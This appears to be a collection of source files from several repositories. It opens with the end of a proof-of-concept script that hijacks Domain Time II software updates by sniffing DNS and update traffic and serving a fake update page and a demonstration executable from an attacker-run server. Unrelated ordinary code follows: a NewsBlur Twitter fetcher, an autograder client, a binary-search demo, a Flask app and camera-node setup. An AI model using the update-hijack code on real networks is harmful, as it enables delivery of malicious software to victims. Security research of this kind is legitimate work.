udp = pkt[UDP]
try:
if udp.dport == 53 or udp.sport == 53:
parse_dns_query(pkt)
if udp.dport == 9909 or udp.sport == 9909:
parse_dt2_pkt(pkt)
except Exception as e:
print(f'[!] Packet caused exception: {str(e)}')
print(f' {pkt.summary()}')
class CustomHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# strip extra params for pattern matching
if '?' in self.path:
path = self.path[:self.path.find('?')]
else:
path = self.path
if path.endswith('.exe'):
# serve a demonstration payload
self.path = 'files/calc.exe'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
elif path.endswith('.asp'):
# serve our copy of their update page
#self.path = 'files/registered.asp.html'
self.path = 'files/evaluation.asp.html'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
else:
# Redirect to non-www greyware domain so they serve the content
self.send_response(302)
self.send_header('Location', f'http://greyware.com/{self.path}')
self.end_headers()
return
def serve_http_thread(server_ip, http_port):
http_address = (server_ip, http_port)
custom_http_server = socketserver.TCPServer(http_address, CustomHttpRequestHandler)
print(f'Serving HTTP at {server_ip} on port {http_port}...')
try:
while True:
custom_http_server.handle_request()
except KeyboardInterrupt:
pass
print('HTTP server stopped.')
def recv_udp(server_ip):
"""Keep 9909:UDP open but do nothing; response happens in sniffer."""
udp_address = (server_ip, 9909)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(udp_address)
print(f'Ready for DT2 traffic at {server_ip}')
try:
while True:
_ = s.recv(0x1000)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser('upgrade_attack.py', description='Proof of concept MotS on DT2 upgrade')
parser.add_argument('interface', help='Interface to sniff/send on')
parser.add_argument('ip_address', help='IP to serve fake update on')
parser.add_argument('-i', '--http_impersonation', help='Run the HTTP impersonation PoC',
default=False, action='store_true')
parser.add_argument('-p', '--port', help='Port to serve fake update on',
type=int, default=80)
args = parser.parse_args()
sniff_iface = args.interface
server_ip = args.ip_address
http_port = args.port
if http_port == 80:
port_string = ''
else:
port_string = f':{http_port}'
# Legitimate update link example:
# 'https://www.greyware.com/software/domaintime/update/evaluation.asp'
if args.http_impersonation:
# This points to their URL (HTTP), which assumes we can win DNS and HTTP races
update_url = 'http://www.greyware.com/software/domaintime/update/evaluation.asp'
#update_url = 'http://www.greyware.com/software/domaintime/update/registered.asp'
else:
# This points to a URL on our server, not theirs
update_url = f'http://{server_ip}{port_string}/software/domaintime/update/evaluation.asp'
#update_url = f'http://{server_ip}{port_string}/software/domaintime/update/registered.asp'
# The typical update domains (DT2 update domain and web domain)
update_domains = ['update.greyware.com', 'www.greyware.com']
http_child = Process(target=serve_http_thread, args=(server_ip, http_port))
http_child.start()
# Let the HTTP server start up first
sleep(1)
if not http_child.is_alive():
print('Error: HTTP server failed to start correctly, quitting...')
exit(-1)
# listen on 9909:UDP so we don't respond that the port is closed
udp_child = Process(target=recv_udp, args=(server_ip,))
udp_child.start()
sleep(0.1)
if not udp_child.is_alive():
print('Warning: failed to listen on port 9909:UDP; may not respond correctly')
# Removes extra scapy logging on send()
conf.verb = False
print(f'Sniffing for upgrade traffic on interface {sniff_iface}, Press CTRL+C to stop...')
try:
sniff(iface=sniff_iface, prn=udp_callback, filter="udp", store=False)
except Scapy_Exception as e:
print(f'Scapy Exception occurred: {str(e)}')
print('Error: Sniffing failed, check you\'re on the right interface and run with sudo.')
http_child.terminate()
http_child.join()
udp_child.terminate()
udp_child.join()
print('Done.')
```
|
{
"source": "jeffballard/NewsBlur",
"score": 2
}
|
#### File: NewsBlur/utils/twitter_fetcher.py
```python
import re
import datetime
import tweepy
import dateutil.parser
from django.conf import settings
from django.utils import feedgenerator
from django.utils.html import linebreaks
from django.utils.dateformat import DateFormat
from apps.social.models import MSocialServices
from apps.reader.models import UserSubscription
from utils import log as logging
class TwitterFetcher:
def __init__(self, feed, options=None):
self.feed = feed
self.options = options or {}
def fetch(self, address=None):
if not address:
address = self.feed.feed_address
self.address = address
twitter_user = None
username = self.extract_username()
if not username:
return
twitter_user = self.fetch_user(username)
if not twitter_user:
return
tweets = self.user_timeline(twitter_user)
data = {}
data['title'] = "%s on Twitter" % username
data['link'] = "https://twitter.com/%s" % username
data['description'] = "%s on Twitter" % username
data['lastBuildDate'] = datetime.datetime.utcnow()
data['generator'] = 'NewsBlur Twitter API Decrapifier - %s' % settings.NEWSBLUR_URL
data['docs'] = None
data['feed_url'] = address
rss = feedgenerator.Atom1Feed(**data)
for tweet in tweets:
story_data = self.tweet_story(tweet.__dict__)
rss.add_item(**story_data)
return rss.writeString('utf-8')
def extract_username(self):
username = None
try:
username_groups = re.search('twitter.com/(\w+)/?', self.address)
if not username_groups:
return
username = username_groups.group(1)
except IndexError:
return
return username
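# Illustration only (hypothetical feed addresses): the regex
# 'twitter.com/(\w+)/?' captures the first path segment, so
#   'https://twitter.com/newsblur/'            -> 'newsblur'
#   'https://twitter.com/newsblur/status/123'  -> 'newsblur'
# and an address with no twitter.com/<name> component returns None.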
def fetch_user(self, username):
twitter_api = None
social_services = None
if self.options.get('requesting_user_id', None):
social_services = MSocialServices.get_user(self.options.get('requesting_user_id'))
try:
twitter_api = social_services.twitter_api()
except tweepy.error.TweepError, e:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: %s' %
(self.feed.log_title[:30], self.address, e))
return
else:
usersubs = UserSubscription.objects.filter(feed=self.feed)
if not usersubs:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: No subscriptions' %
(self.feed.log_title[:30], self.address))
return
for sub in usersubs:
social_services = MSocialServices.get_user(sub.user_id)
if not social_services.twitter_uid: continue
try:
twitter_api = social_services.twitter_api()
if not twitter_api:
continue
else:
break
except tweepy.error.TweepError, e:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: %s' %
(self.feed.log_title[:30], self.address, e))
continue
if not twitter_api:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: No twitter API for %s' %
(self.feed.log_title[:30], self.address, usersubs[0].user.username))
return
try:
twitter_user = twitter_api.get_user(username)
except TypeError, e:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: %s" % (e))
return
except tweepy.error.TweepError, e:
message = str(e).lower()
if ((len(e.args) >= 3 and e.args[2] == 63) or
('temporarily locked' in message)):
# Suspended
logging.debug(u' ***> [%-30s] ~FRTwitter failed, user suspended, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User suspended")
return
elif 'suspended' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user suspended, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User suspended")
return
elif 'expired token' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user expired, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: Expired token")
social_services.disconnect_twitter()
return
elif 'not found' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user not found, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User not found")
return
elif 'over capacity' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter over capacity, ignoring... %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(460, "Twitter Error: Over capacity")
return
else:
raise e
return twitter_user
def user_timeline(self, twitter_user):
try:
tweets = twitter_user.timeline(tweet_mode='extended')
except tweepy.error.TweepError, e:
message = str(e).lower()
if 'not authorized' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter timeline failed, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: Not authorized")
return []
elif 'user not found' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user not found, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User not found")
return []
elif 'blocked from viewing' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user blocked, ignoring: %s' %
(self.feed.log_title[:30], e))
self.feed.save_feed_history(560, "Twitter Error: Blocked from viewing")
return []
else:
raise e
if not tweets:
return []
return tweets
def tweet_story(self, user_tweet):
categories = set()
if user_tweet['full_text'].startswith('RT @'):
categories.add('retweet')
elif user_tweet['in_reply_to_status_id'] or user_tweet['full_text'].startswith('@'):
categories.add('reply')
else:
categories.add('tweet')
if user_tweet['full_text'].startswith('RT @'):
categories.add('retweet')
if user_tweet['favorite_count']:
categories.add('liked')
if user_tweet['retweet_count']:
categories.add('retweeted')
if 'http' in user_tweet['full_text']:
categories.add('link')
story = {}
content_tweet = user_tweet
entities = ""
author = user_tweet.get('author') or user_tweet.get('user')
if not isinstance(author, dict): author = author.__dict__
author_name = author['screen_name']
original_author_name = author_name
if user_tweet['in_reply_to_user_id'] == author['id']:
categories.add('reply-to-self')
retweet_author = ""
if 'retweeted_status' in user_tweet:
retweet_author = """Retweeted by
<a href="https://twitter.com/%s"><img src="%s" style="height: 20px" /></a>
<a href="https://twitter.com/%s">%s</a>
on %s""" % (
author_name,
author['profile_image_url_https'],
author_name,
author_name,
DateFormat(user_tweet['created_at']).format('l, F jS, Y g:ia').replace('.',''),
)
content_tweet = user_tweet['retweeted_status'].__dict__
author = content_tweet['author']
if not isinstance(author, dict): author = author.__dict__
author_name = author['screen_name']
tweet_title = user_tweet['full_text']
tweet_text = linebreaks(content_tweet['full_text'])
replaced = {}
entities_media = content_tweet['entities'].get('media', [])
if 'extended_entities' in content_tweet:
entities_media = content_tweet['extended_entities'].get('media', [])
for media in entities_media:
if 'media_url_https' not in media: continue
if media['type'] == 'photo':
if media.get('url') and media['url'] in tweet_text:
tweet_title = tweet_title.replace(media['url'], media['display_url'])
replacement = "<a href=\"%s\">%s</a>" % (media['expanded_url'], media['display_url'])
if not replaced.get(media['url']):
tweet_text = tweet_text.replace(media['url'], replacement)
replaced[media['url']] = True
entities += "<img src=\"%s\"> <hr>" % media['media_url_https']
if 'photo' not in categories:
categories.add('photo')
for url in content_tweet['entities'].get('urls', []):
if url['url'] in tweet_text:
replacement = "<a href=\"%s\">%s</a>" % (url['expanded_url'], url['display_url'])
if not replaced.get(url['url']):
tweet_text = tweet_text.replace(url['url'], replacement)
replaced[url['url']] = True
tweet_title = tweet_title.replace(url['url'], url['display_url'])
quote_tweet_content = ""
if 'quoted_status' in content_tweet:
quote_tweet_content = "<blockquote>"+self.tweet_story(content_tweet['quoted_status'])['description']+"</blockquote>"
created_date = content_tweet['created_at']
if isinstance(created_date, unicode):
created_date = dateutil.parser.parse(created_date)
content = """<div class="NB-twitter-rss">
<div class="NB-twitter-rss-tweet">%s</div>
<div class="NB-twitter-rss-quote-tweet">%s</div>
<hr />
<div class="NB-twitter-rss-entities">%s</div>
<div class="NB-twitter-rss-author">
Posted by
<a href="https://twitter.com/%s"><img src="%s" style="height: 32px" /></a>
<a href="https://twitter.com/%s">%s</a>
on %s</div>
<div class="NB-twitter-rss-retweet">%s</div>
<div class="NB-twitter-rss-stats">%s %s%s %s</div>
</div>""" % (
tweet_text,
quote_tweet_content,
entities,
author_name,
author['profile_image_url_https'],
author_name,
author_name,
DateFormat(created_date).format('l, F jS, Y g:ia').replace('.',''),
retweet_author,
("<br /><br />" if content_tweet['favorite_count'] or content_tweet['retweet_count'] else ""),
("<b>%s</b> %s" % (content_tweet['favorite_count'], "like" if content_tweet['favorite_count'] == 1 else "likes")) if content_tweet['favorite_count'] else "",
(", " if content_tweet['favorite_count'] and content_tweet['retweet_count'] else ""),
("<b>%s</b> %s" % (content_tweet['retweet_count'], "retweet" if content_tweet['retweet_count'] == 1 else "retweets")) if content_tweet['retweet_count'] else "",
)
story = {
'title': tweet_title,
'link': "https://twitter.com/%s/status/%s" % (original_author_name, user_tweet['id']),
'description': content,
'author_name': author_name,
'categories': list(categories),
'unique_id': "tweet:%s" % user_tweet['id'],
'pubdate': user_tweet['created_at'],
}
return story
```
|
{
"source": "jeffballard/ok",
"score": 3
}
|
#### File: ok/server/autograder.py
```python
import collections
import datetime
import enum
import json
import logging
import time
import oauthlib.common
import requests
from server import constants, jobs, utils
from server.models import User, Assignment, Backup, Client, Score, Token, db
logger = logging.getLogger(__name__)
def send_autograder(endpoint, data):
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(constants.AUTOGRADER_URL + endpoint,
data=json.dumps(data), headers=headers, timeout=8)
if r.status_code == requests.codes.ok:
if r.text == "OK": # e.g. when the token is "test"
return None
return r.json()
else:
error_message = 'The autograder rejected your request. {0}'.format(
r.text)
logger.debug('Autograder {} response: {}'.format(r.status_code,
error_message))
raise ValueError(error_message)
def create_autograder_token(user_id):
autograder_client = Client.query.get('autograder')
if not autograder_client:
autograder_client = Client(
name='Autograder',
client_id='autograder',
client_secret='autograder',
redirect_uris=[],
is_confidential=False,
description='The Autopy autograder system',
default_scopes=['all'],
)
db.session.add(autograder_client)
db.session.commit()
token = Token(
client=autograder_client,
user_id=user_id,
token_type='bearer',
access_token=oauthlib.common.generate_token(),
expires=datetime.datetime.utcnow() + datetime.timedelta(hours=2),
scopes=['all'],
)
db.session.add(token)
db.session.commit()
return token
def send_batch(token, assignment, backup_ids, priority='default'):
"""Send a batch of backups to the autograder, returning a dict mapping
backup ID -> autograder job ID.
"""
if not assignment.autograding_key:
raise ValueError('Assignment has no autograder key')
response_json = send_autograder('/api/ok/v3/grade/batch', {
'subm_ids': [utils.encode_id(bid) for bid in backup_ids],
'assignment': assignment.autograding_key,
'access_token': token.access_token,
'priority': priority,
'ok-server-version': 'v3',
})
if response_json:
return dict(zip(backup_ids, response_json['jobs']))
else:
return {}
def autograde_backup(token, assignment, backup_id):
"""Autograde a backup, returning and autograder job ID."""
job_ids = send_batch(token, assignment, [backup_id], priority='high')
return job_ids.get(backup_id)
def submit_continuous(backup):
""" Intended for continous grading (email with results on submit)
"""
email = backup.submitter.email
assignment = backup.assignment
file_contents = [b for b in backup.messages if b.kind == 'file_contents']
if not file_contents:
raise ValueError("No files to grade")
if not assignment.autograding_key:
raise ValueError("Not setup for autograding")
data = {
'assignment': assignment.autograding_key,
'file_contents': file_contents[0].contents,
'submitter': email,
'emails': [User.email_by_id(oid) for oid in backup.owners()]
}
if not backup.submitter.is_enrolled(assignment.course_id):
raise ValueError("User is not enrolled and cannot be autograded")
return send_autograder('/api/file/grade/continous', data)
def check_job_results(job_ids):
"""Given a list of autograder job IDs, return a dict mapping job IDs to
either null (if the job does not exist) or a dict with keys
status: one of 'queued', 'finished', 'failed', 'started', 'deferred'
result: string
"""
return send_autograder('/results', job_ids)
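# Illustration only (job IDs are made up): a check_job_results() response
# might look like
#   {'job-1': {'status': 'finished', 'result': '...'},
#    'job-2': {'status': 'queued', 'result': ''},
#    'job-3': None}   # job-3 is unknown to the autograder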
GradingStatus = enum.Enum('GradingStatus', [
'QUEUED', # a job is queued
'RUNNING', # a job is running
'WAITING', # the last job has finished, and we are waiting for a score
'DONE', # we have a score
'FAILED', # we could not get a score after several retries
])
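# Sketch of the transitions driven by autograde_backups() below:
# QUEUED -> RUNNING -> WAITING -> DONE on the happy path; a job that
# disappears, fails, or outlives its timeout goes back to QUEUED via
# retry_task(), and after MAX_RETRIES retries the task is marked FAILED.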
class GradingTask:
def __init__(self, status, backup_id, job_id, retries):
self.status = status
self.backup_id = backup_id
self.job_id = job_id
self.retries = retries
self.status_change_time = time.time()
def set_status(self, status):
self.status = status
self.status_change_time = time.time()
def expired(self, timeout):
"""Returns True if it has been at least TIMEOUT seconds since the last
status change.
"""
return time.time() > self.status_change_time + timeout
MAX_RETRIES = 3 # maximum number of times to retry a score
QUEUED_TIMEOUT = 30 * 60 # maximum time for an autograder job to be queued, in seconds
RUNNING_TIMEOUT = 5 * 60 # time to wait for an autograder job to run, in seconds
WAITING_TIMEOUT = 2 * 60 # time to wait for a score, in seconds
POLL_INTERVAL = 10 # how often to poll the autograder, in seconds
def autograde_backups(assignment, user_id, backup_ids, logger):
token = create_autograder_token(user_id)
start_time = time.time()
job_ids = send_batch(token, assignment, backup_ids)
tasks = [
GradingTask(
status=GradingStatus.QUEUED,
backup_id=backup_id,
job_id=job_id,
retries=0,
)
for backup_id, job_id in job_ids.items()
]
num_tasks = len(tasks)
def retry_task(task):
if task.retries >= MAX_RETRIES:
logger.error('Did not receive a score for backup {} after {} retries'.format(
utils.encode_id(task.backup_id), MAX_RETRIES))
task.set_status(GradingStatus.FAILED)
else:
task.set_status(GradingStatus.QUEUED)
task.job_id = autograde_backup(token, assignment, task.backup_id)
task.retries += 1
while True:
time.sleep(POLL_INTERVAL)
results = check_job_results([task.job_id for task in tasks])
graded = len([task for task in tasks
if task.status in (GradingStatus.DONE, GradingStatus.FAILED)])
logger.info('Graded {:>4}/{} ({:>5.1f}%)'.format(
graded, num_tasks, 100 * graded / num_tasks))
if graded == num_tasks:
break
for task in tasks:
hashid = utils.encode_id(task.backup_id)
if task.status == GradingStatus.QUEUED:
result = results[task.job_id]
if not result:
logger.warning('Autograder job {} for backup {} disappeared, retrying'.format(task.job_id, hashid))
retry_task(task)
elif result['status'] != 'queued':
logger.debug('Autograder job {} for backup {} started'.format(
task.job_id, hashid))
task.set_status(GradingStatus.RUNNING)
elif task.expired(QUEUED_TIMEOUT):
logger.warning('Autograder job {} for backup {} queued longer than {} seconds, retrying'.format(
task.job_id, hashid, QUEUED_TIMEOUT))
retry_task(task)
elif task.status == GradingStatus.RUNNING:
result = results[task.job_id]
if not result:
logger.warning('Autograder job {} for backup {} disappeared, retrying'.format(task.job_id, hashid))
retry_task(task)
elif result['status'] == 'finished':
logger.debug('Autograder job {} for backup {} finished'.format(
task.job_id, hashid))
task.set_status(GradingStatus.WAITING)
elif result['status'] == 'failed':
logger.warning('Autograder job {} for backup {} failed, retrying'.format(task.job_id, hashid))
retry_task(task)
elif task.expired(RUNNING_TIMEOUT):
logger.warning('Autograder job {} for backup {} running longer than {} seconds, retrying'.format(
task.job_id, hashid, RUNNING_TIMEOUT))
retry_task(task)
elif task.status == GradingStatus.WAITING:
score = Score.query.filter(
Score.backup_id == task.backup_id,
Score.archived == False,
Score.created > datetime.datetime.fromtimestamp(start_time)
).first()
if score:
logger.debug('Received score for backup {}'.format(hashid))
task.set_status(GradingStatus.DONE)
elif task.expired(WAITING_TIMEOUT):
logger.warning('Did not receive score for backup {} in {} seconds, retrying'.format(
hashid, WAITING_TIMEOUT))
retry_task(task)
# report summary
statuses = collections.Counter(task.status for task in tasks)
message = '{} graded, {} failed'.format(
statuses[GradingStatus.DONE], statuses[GradingStatus.FAILED])
logger.info(message)
@jobs.background_job
def autograde_assignment(assignment_id):
"""Autograde all enrolled students for this assignment.
We set up a state machine for each backup to check its progress through
the autograder. If any step takes too long, we'll retry autograding that
backup. Ultimately, a backup is considered done when we confirm that
we've received a new score, or if we have reached the retry limit.
"""
logger = jobs.get_job_logger()
assignment = Assignment.query.get(assignment_id)
course_submissions = assignment.course_submissions(include_empty=False)
backup_ids = set(fs['backup']['id'] for fs in course_submissions if fs['backup'])
try:
autograde_backups(assignment, jobs.get_current_job().user_id, backup_ids, logger)
except ValueError:
logger.info('Could not autograde backups - Please add an autograding key.')
return
return '/admin/course/{cid}/assignments/{aid}/scores'.format(
cid=jobs.get_current_job().course_id, aid=assignment.id)
```
|
{
"source": "jeffbarnette/Binary-Search",
"score": 4
}
|
#### File: jeffbarnette/Binary-Search/binary_search.py
```python
import random
import time
# Naive Search Algorithm
def naive_search(l, target):
# example l = [1, 3, 10, 12]
for i in range(len(l)):
if l[i] == target:
return i
return -1
# Binary Search Algorithm (Divide and Conquer)
def binary_search(l, target, low=None, high=None):
if low is None:
low = 0
if high is None:
high = len(l) - 1
if high < low:
return -1
# example l = [1, 3, 5, 10, 12]
midpoint = (low + high) // 2
if l[midpoint] == target:
return midpoint
elif target < l[midpoint]:
return binary_search(l, target, low, midpoint - 1)
else:
# target > l[midpoint]
return binary_search(l, target, midpoint + 1, high)
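# Rough intuition: each recursive call halves the search range, so binary_search
# does O(log n) work per lookup versus O(n) for naive_search. For example,
# finding 10 in [1, 3, 5, 10, 12] inspects midpoint 5 (index 2), then recurses
# on indices 3..4 and finds 10 at index 3 -- two midpoint checks instead of the
# four element checks naive_search needs.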
if __name__ == '__main__':
# l = [1, 3, 5, 10, 12]
# target = 100
# print(naive_search(l, target))
# print(binary_search(l, target))
length = 50000
# Build a sorted list of length 50,000
sorted_list = set()
while len(sorted_list) < length:
sorted_list.add(random.randint(-3 * length, 3 * length))
sorted_list = sorted(list(sorted_list))
# Perform the searches and measure the time
print("")
start = time.time()
for target in sorted_list:
naive_search(sorted_list, target)
end = time.time()
print("Naive search time:", (end - start), "seconds.\n")
start = time.time()
for target in sorted_list:
binary_search(sorted_list, target)
end = time.time()
print("Binary search time:", (end - start), "seconds.\n")
```
|
{
"source": "jeffbarnette/MBTA-One-Stop",
"score": 3
}
|
#### File: MBTA-One-Stop/backend/app.py
```python
from flask import Flask
from flask_cors import CORS
from api.routes.main import main_api
def create_app():
app = Flask(__name__)
app.config["DEBUG"] = True
CORS(app)
# Default Path
@app.route('/', methods=['GET'])
def home():
return "<p>This service is working.</p>"
# API path
app.register_blueprint(main_api, url_prefix='/api')
return app
# This is being run from command line as the main application
if __name__ == '__main__':
from argparse import ArgumentParser
# Allow -p flag to override the default port number
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
app = create_app()
app.run(host='127.0.0.1', port=port)
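# Example invocations (assuming this file is run directly as app.py):
#   python app.py           -> serves on http://127.0.0.1:5000
#   python app.py -p 8080   -> serves on http://127.0.0.1:8080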
```
|
{
"source": "jeffbass/imagenode",
"score": 3
}
|
#### File: imagenode/tools/imaging.py
```python
import os
import sys
import yaml
import pprint
import signal
import logging
import itertools
import threading
import multiprocessing
from time import sleep
from datetime import datetime
from ast import literal_eval
from collections import deque
import numpy as np
import cv2
import imutils
from imutils.video import VideoStream
import zmq # needed to use zmq.LINGER in ImageNode.closeall methods
import imagezmq
from tools.utils import interval_timer
from tools.nodehealth import HealthMonitor
from tools.utils import versionCompare
from pkg_resources import require
class ImageNode:
""" Contains all the attributes and methods of this imagenode
One ImageNode is instantiated during the startup of the imagenode.py
program. It takes the settings loaded from the YAML file and sets all
the operational parameters of the imagenode, including the hub address that
images and messages will be sent to, camera settings, sensors, etc. as
attributes of the ImageNode.
The ImageNode also contains all the methods to gather, process and send
images, event detection messages and sensor data to the ImageHub.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings):
# set various node attributes; also check that numpy and OpenCV are OK
self.tiny_image = np.zeros((3, 3), dtype="uint8") # tiny blank image
ret_code, jpg_buffer = cv2.imencode(
".jpg", self.tiny_image, [int(cv2.IMWRITE_JPEG_QUALITY), 95])
self.tiny_jpg = jpg_buffer # matching tiny blank jpeg
self.jpeg_quality = 95
self.pid = os.getpid() # get process ID of this program
# open ZMQ link to imagehub
self.sender = imagezmq.ImageSender(connect_to=settings.hub_address)
self.sender.zmq_socket.setsockopt(zmq.LINGER, 0) # prevents ZMQ hang on exit
# If settings.REP_watcher is True, pick the send_frame function
# that does time recording of each REQ and REP. Start REP_watcher
# thread. Set up deques to track REQ and REP times.
self.patience = settings.patience # how long to wait in seconds
if settings.send_type == 'image': # set send function to image
if settings.REP_watcher:
self.send_frame = self.send_image_frame_REP_watcher
else:
self.send_frame = self.send_image_frame
else: # anything not spelled 'image' sets send function to jpg
if settings.REP_watcher:
self.send_frame = self.send_jpg_frame_REP_watcher
else:
self.send_frame = self.send_jpg_frame
if settings.REP_watcher: # set up deques & start thread to watch for REP
threading.Thread(daemon=True, target=self.REP_watcher).start()
self.REQ_sent_time = deque(maxlen=1)
self.REP_recd_time = deque(maxlen=1)
# set up message queue to hold (text, image) messages to be sent to hub
if settings.send_threading: # use a threaded send_q sender instead
self.send_q = SendQueue(maxlen=settings.queuemax,
send_frame=self.send_frame,
process_hub_reply=self.process_hub_reply)
self.send_q.start()
else:
self.send_q = deque(maxlen=settings.queuemax)
# start system health monitoring & get system type (RPi vs Mac etc)
self.health = HealthMonitor(settings, self.send_q)
self.sensors = [] # need an empty list even if no sensors
self.lights = []
if self.health.sys_type == 'RPi': # set up GPIO & sensors
if settings.sensors or settings.lights:
global GPIO
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
if settings.sensors: # is there at least one sensor in yaml file
self.setup_sensors(settings)
if settings.lights: # is there at least one light in yaml file
self.setup_lights(settings)
# set up and start camera(s)
self.camlist = [] # need an empty list if there are no cameras
if settings.cameras: # is there at least one camera in yaml file
self.setup_cameras(settings)
# Read a test image from each camera to check and verify:
# 1. test that all cameras can successfully read an image
# 2. determine actual camera resolution from returned image size
# 3. if resize_width has been set, test that it works without error
# 4. for each detector, convert roi_pct to roi_pixels
# Note that image size returned from reading the camera can vary from
# requested resolution size, especially in webcams
for camera in self.camlist:
testimage = camera.cam.read()
image_size = testimage.shape # actual image_size from this camera
width, height = image_size[1], image_size[0]
camera.res_actual = (width, height)
if camera.resize_width:
camera.width_pixels = (width * camera.resize_width) // 100
testimage = imutils.resize(testimage, width=camera.width_pixels)
image_size = testimage.shape
width, height = image_size[1], image_size[0]
else:
camera.width_pixels = width
camera.res_resized = (width, height)
# compute ROI in pixels using roi_pct and current image size
for detector in camera.detectors:
top_left_x = detector.roi_pct[0][0] * width // 100
top_left_y = detector.roi_pct[0][1] * height // 100
bottom_right_x = detector.roi_pct[1][0] * width // 100
bottom_right_y = detector.roi_pct[1][1] * height // 100
detector.top_left = (top_left_x, top_left_y)
detector.bottom_right = (bottom_right_x, bottom_right_y)
detector.roi_pixels = (detector.top_left, detector.bottom_right)
detector.roi_area = ((bottom_right_x - top_left_x)
* (bottom_right_y - top_left_y))
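# Worked example (numbers are illustrative only): with a 640x480 image and
# roi_pct = ((10, 10), (90, 90)), top_left becomes (64, 48), bottom_right
# becomes (576, 432), and roi_area = (576 - 64) * (432 - 48) = 196608 pixels.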
if detector.detector_type == 'motion':
detector.min_area_pixels = (detector.roi_area
* detector.min_area) // 100
# location of timestamp based on image size
if detector.draw_time:
time_x = detector.draw_time_org[0] * width // 100
time_y = detector.draw_time_org[1] * height // 100
detector.draw_time_org = (time_x, time_y)
if settings.print_node:
self.print_node_details(settings)
# send an imagenode startup event message with system values
text = '|'.join([settings.nodename,
'Restart',
self.health.hostname,
self.health.sys_type,
self.health.ipaddress,
self.health.ram_size,
self.health.time_since_restart])
text_and_image = (text, self.tiny_image)
self.send_q.append(text_and_image)
def print_node_details(self, settings):
print('Node details after setup and camera test read:')
print(' Node name:', settings.nodename)
print(' System Type:', self.health.sys_type)
for cam in self.camlist:
print(' Camera:', cam.cam_type)
print(' Resolution requested:', cam.resolution)
print(' Resolution actual after cam read:', cam.res_actual)
print(' Resize_width setting:', cam.resize_width)
print(' Resolution after resizing:', cam.res_resized)
if cam.cam_type == 'PiCamera':
# check picamera version
try:
picamversion = require('picamera')[0].version
except:
picamversion = '0'
print(' PiCamera:')
# awb_mode: off, auto, sunlight, cloudy, shade, tungsten, fluorescent, incandescent, flash, horizon
print(' awb_mode:', cam.cam.camera.awb_mode, '(default = auto)')
print(' brightness:', cam.cam.camera.brightness, '(default = 50, integer between 0 and 100)')
print(' contrast:', cam.cam.camera.contrast, '(default = 0, integer between -100 and 100)')
# exposure_compensation: integer value between -25 and 25
print(' exposure_compensation:', cam.cam.camera.exposure_compensation, '(default = 0)')
# exposure_mode: - off, auto, night, nightpreview, backlight, spotlight, sports, snow, beach, verylong,
# fixedfps, antishake, fireworks
print(' exposure_mode:', cam.cam.camera.exposure_mode, '(default = auto)')
print(' framerate:', cam.cam.camera.framerate, '(default = 30)')
print(' iso:', cam.cam.camera.iso, '(default = 0 for auto - 0,100,200,320,400,500,640,800)')
# meter_mode: average, spot, backlit, matrix
print(' meter_mode:', cam.cam.camera.meter_mode, '(default = average)')
print(' saturation:', cam.cam.camera.saturation, '(default = 0, integer between -100 and 100)')
print(' sharpness:', cam.cam.camera.sharpness, '(default = 0, integer between -100 and 100)')
print(' shutter_speed:', cam.cam.camera.shutter_speed, '(microseconds - default = 0 for auto)')
if versionCompare('1.6', picamversion) != 1:
print(' analog_gain:', float(cam.cam.camera.analog_gain), '(read-only)')
# awb_gains: typical values for the gains are between 0.9 and 1.9 - when awb_mode = off
print(' awb_gains:', cam.cam.camera.awb_gains)
print(' digital_gain:', float(cam.cam.camera.digital_gain), '(read-only)')
print(' exposure_speed:', cam.cam.camera.exposure_speed, '(microseconds - read-only)')
if versionCompare('1.13', picamversion) != 1:
print(' revision:', cam.cam.camera.revision, '(ov5647 = V1, imx219 = V2, imx477 = HQ)')
for detector in cam.detectors:
print(' Detector:', detector.detector_type)
print(' ROI:', detector.roi_pct, '(in percents)')
print(' ROI:', detector.roi_pixels, '(in pixels)')
print(' ROI area:', detector.roi_area, '(in pixels)')
print(' ROI name:', detector.roi_name)
print(' send_test_images:', detector.send_test_images)
print(' send_count:', detector.send_count)
if detector.detector_type == 'light':
print(' threshold:', detector.threshold)
print(' min_frames:', detector.min_frames)
elif detector.detector_type == 'motion':
print(' delta_threshold:', detector.delta_threshold)
print(' min_motion_frames:', detector.min_motion_frames)
print(' min_still_frames:', detector.min_still_frames)
print(' min_area:', detector.min_area, '(in percent)')
print(' min_area:', detector.min_area_pixels, '(in pixels)')
print(' blur_kernel_size:', detector.blur_kernel_size)
print(' print_still_frames:', detector.print_still_frames)
print()
